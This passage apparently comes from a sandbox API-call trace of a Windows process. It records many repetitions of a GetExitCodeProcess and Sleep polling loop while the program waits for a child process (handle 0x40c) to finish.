lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.463] Sleep (dwMilliseconds=0x19) [0137.545] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.545] Sleep (dwMilliseconds=0x19) [0137.593] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.593] Sleep (dwMilliseconds=0x19) [0137.703] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.703] Sleep (dwMilliseconds=0x19) [0137.746] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.746] Sleep (dwMilliseconds=0x19) [0137.909] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.909] Sleep (dwMilliseconds=0x19) [0138.003] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.004] Sleep (dwMilliseconds=0x19) [0138.037] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.037] Sleep (dwMilliseconds=0x19) [0138.069] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.069] Sleep (dwMilliseconds=0x19) [0138.105] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.105] Sleep (dwMilliseconds=0x19) [0138.163] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.163] Sleep (dwMilliseconds=0x19) [0138.217] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.217] Sleep (dwMilliseconds=0x19) [0138.256] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.256] Sleep (dwMilliseconds=0x19) [0138.303] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.303] Sleep (dwMilliseconds=0x19) [0138.364] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.364] Sleep (dwMilliseconds=0x19) [0138.409] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.409] Sleep (dwMilliseconds=0x19) [0138.447] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.447] Sleep (dwMilliseconds=0x19) [0138.483] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.483] Sleep (dwMilliseconds=0x19) [0138.511] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.511] Sleep (dwMilliseconds=0x19) [0138.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.559] Sleep (dwMilliseconds=0x19) [0138.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.608] Sleep (dwMilliseconds=0x19) [0138.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.666] Sleep (dwMilliseconds=0x19) [0138.742] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.742] Sleep (dwMilliseconds=0x19) [0138.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.814] Sleep (dwMilliseconds=0x19) [0138.927] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.927] Sleep (dwMilliseconds=0x19) [0138.966] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0138.966] Sleep (dwMilliseconds=0x19) [0139.028] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.028] Sleep (dwMilliseconds=0x19) [0139.394] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.394] Sleep (dwMilliseconds=0x19) [0139.435] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.435] Sleep (dwMilliseconds=0x19) [0139.494] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.494] Sleep (dwMilliseconds=0x19) [0139.523] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.523] Sleep (dwMilliseconds=0x19) [0139.551] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.552] Sleep (dwMilliseconds=0x19) [0139.687] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.687] Sleep (dwMilliseconds=0x19) [0139.737] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.737] Sleep (dwMilliseconds=0x19) [0139.797] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.798] Sleep (dwMilliseconds=0x19) [0139.898] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.898] Sleep (dwMilliseconds=0x19) [0139.936] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.936] Sleep (dwMilliseconds=0x19) [0139.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0139.973] Sleep (dwMilliseconds=0x19) [0140.009] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.009] Sleep (dwMilliseconds=0x19) [0140.056] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.057] Sleep (dwMilliseconds=0x19) [0140.100] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.100] Sleep (dwMilliseconds=0x19) [0140.142] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.142] Sleep (dwMilliseconds=0x19) [0140.177] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.178] Sleep (dwMilliseconds=0x19) [0140.206] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.206] Sleep (dwMilliseconds=0x19) [0140.270] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.270] Sleep (dwMilliseconds=0x19) [0140.307] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.307] Sleep (dwMilliseconds=0x19) [0140.355] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.355] Sleep (dwMilliseconds=0x19) [0140.446] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.446] Sleep (dwMilliseconds=0x19) [0140.487] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.487] Sleep (dwMilliseconds=0x19) [0140.514] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.515] Sleep (dwMilliseconds=0x19) [0140.565] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.566] Sleep (dwMilliseconds=0x19) [0140.627] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.627] Sleep (dwMilliseconds=0x19) [0140.715] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.715] Sleep (dwMilliseconds=0x19) [0140.746] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.746] Sleep (dwMilliseconds=0x19) [0140.787] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.787] Sleep (dwMilliseconds=0x19) [0140.906] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.906] Sleep (dwMilliseconds=0x19) [0140.934] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.934] Sleep (dwMilliseconds=0x19) [0140.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0140.969] Sleep (dwMilliseconds=0x19) [0141.030] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.031] Sleep (dwMilliseconds=0x19) [0141.062] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.062] Sleep (dwMilliseconds=0x19) [0141.155] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.155] Sleep (dwMilliseconds=0x19) [0141.186] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.186] Sleep (dwMilliseconds=0x19) [0141.216] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.216] Sleep (dwMilliseconds=0x19) [0141.253] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.253] Sleep (dwMilliseconds=0x19) [0141.322] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.322] Sleep (dwMilliseconds=0x19) [0141.349] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.349] Sleep (dwMilliseconds=0x19) [0141.412] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.413] Sleep (dwMilliseconds=0x19) [0141.439] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.439] Sleep (dwMilliseconds=0x19) [0141.479] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.479] Sleep (dwMilliseconds=0x19) [0141.544] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.544] Sleep (dwMilliseconds=0x19) [0141.581] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.581] Sleep (dwMilliseconds=0x19) [0141.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.615] Sleep (dwMilliseconds=0x19) [0141.918] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0141.918] Sleep (dwMilliseconds=0x19) [0142.033] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.033] Sleep (dwMilliseconds=0x19) [0142.152] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.152] Sleep (dwMilliseconds=0x19) [0142.179] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.179] Sleep (dwMilliseconds=0x19) [0142.221] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.221] Sleep (dwMilliseconds=0x19) [0142.253] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.253] Sleep (dwMilliseconds=0x19) [0142.314] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.315] Sleep (dwMilliseconds=0x19) [0142.354] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.354] Sleep (dwMilliseconds=0x19) [0142.424] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.424] Sleep (dwMilliseconds=0x19) [0142.457] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.457] Sleep (dwMilliseconds=0x19) [0142.485] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.485] Sleep (dwMilliseconds=0x19) [0142.539] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.539] Sleep (dwMilliseconds=0x19) [0142.566] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.566] Sleep (dwMilliseconds=0x19) [0142.637] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.637] Sleep (dwMilliseconds=0x19) [0142.762] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.762] Sleep (dwMilliseconds=0x19) [0142.800] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.801] Sleep (dwMilliseconds=0x19) [0142.902] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.902] Sleep (dwMilliseconds=0x19) [0142.938] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.938] Sleep (dwMilliseconds=0x19) [0142.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0142.969] Sleep (dwMilliseconds=0x19) [0143.051] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.051] Sleep (dwMilliseconds=0x19) [0143.081] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.082] Sleep (dwMilliseconds=0x19) [0143.123] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.123] Sleep (dwMilliseconds=0x19) [0143.171] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.171] Sleep (dwMilliseconds=0x19) [0143.203] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.203] Sleep (dwMilliseconds=0x19) [0143.279] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.279] Sleep (dwMilliseconds=0x19) [0143.306] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.306] Sleep (dwMilliseconds=0x19) [0143.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.366] Sleep (dwMilliseconds=0x19) [0143.395] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.395] Sleep (dwMilliseconds=0x19) [0143.445] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.445] Sleep (dwMilliseconds=0x19) [0143.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.502] Sleep (dwMilliseconds=0x19) [0143.529] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.529] Sleep (dwMilliseconds=0x19) [0143.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.559] Sleep (dwMilliseconds=0x19) [0143.589] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.591] Sleep (dwMilliseconds=0x19) [0143.627] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.627] Sleep (dwMilliseconds=0x19) [0143.675] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.675] Sleep (dwMilliseconds=0x19) [0143.704] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.704] Sleep (dwMilliseconds=0x19) [0143.731] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.731] Sleep (dwMilliseconds=0x19) [0143.775] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.775] Sleep (dwMilliseconds=0x19) [0143.809] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.809] Sleep (dwMilliseconds=0x19) [0143.971] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0143.971] Sleep (dwMilliseconds=0x19) [0144.006] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.007] Sleep (dwMilliseconds=0x19) [0144.051] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.051] Sleep (dwMilliseconds=0x19) [0144.078] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.079] Sleep (dwMilliseconds=0x19) [0144.150] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.150] Sleep (dwMilliseconds=0x19) [0144.181] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.181] Sleep (dwMilliseconds=0x19) [0144.210] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.210] Sleep (dwMilliseconds=0x19) [0144.270] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.270] Sleep (dwMilliseconds=0x19) [0144.358] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.358] Sleep (dwMilliseconds=0x19) [0144.396] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.397] Sleep (dwMilliseconds=0x19) [0144.427] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.427] Sleep (dwMilliseconds=0x19) [0144.462] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.462] Sleep (dwMilliseconds=0x19) [0144.489] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.489] Sleep (dwMilliseconds=0x19) [0144.523] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.523] Sleep (dwMilliseconds=0x19) [0144.558] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.558] Sleep (dwMilliseconds=0x19) [0144.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.608] Sleep (dwMilliseconds=0x19) [0144.645] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.645] Sleep (dwMilliseconds=0x19) [0144.673] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.673] Sleep (dwMilliseconds=0x19) [0144.720] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.720] Sleep (dwMilliseconds=0x19) [0144.767] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.767] Sleep (dwMilliseconds=0x19) [0144.877] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.877] Sleep (dwMilliseconds=0x19) [0144.917] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.917] Sleep (dwMilliseconds=0x19) [0144.952] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.952] Sleep (dwMilliseconds=0x19) [0144.991] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0144.991] Sleep (dwMilliseconds=0x19) [0145.032] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.032] Sleep (dwMilliseconds=0x19) [0145.121] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.121] Sleep (dwMilliseconds=0x19) [0145.160] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.161] Sleep (dwMilliseconds=0x19) [0145.189] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.189] Sleep (dwMilliseconds=0x19) [0145.227] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.227] Sleep (dwMilliseconds=0x19) [0145.257] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.257] Sleep (dwMilliseconds=0x19) [0145.292] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.292] Sleep (dwMilliseconds=0x19) [0145.325] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.325] Sleep (dwMilliseconds=0x19) [0145.385] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.385] Sleep (dwMilliseconds=0x19) [0145.425] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.425] Sleep (dwMilliseconds=0x19) [0145.456] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.456] Sleep (dwMilliseconds=0x19) [0145.488] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.488] Sleep (dwMilliseconds=0x19) [0145.535] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.535] Sleep (dwMilliseconds=0x19) [0145.562] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.562] Sleep (dwMilliseconds=0x19) [0145.596] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.596] Sleep (dwMilliseconds=0x19) [0145.630] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.630] Sleep (dwMilliseconds=0x19) [0145.659] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.659] Sleep (dwMilliseconds=0x19) [0145.900] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.900] Sleep (dwMilliseconds=0x19) [0145.958] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.958] Sleep (dwMilliseconds=0x19) [0145.988] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0145.988] Sleep (dwMilliseconds=0x19) [0146.061] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.061] Sleep (dwMilliseconds=0x19) [0146.089] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.089] Sleep (dwMilliseconds=0x19) [0146.120] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.120] Sleep (dwMilliseconds=0x19) [0146.150] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.150] Sleep (dwMilliseconds=0x19) [0146.177] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.178] Sleep 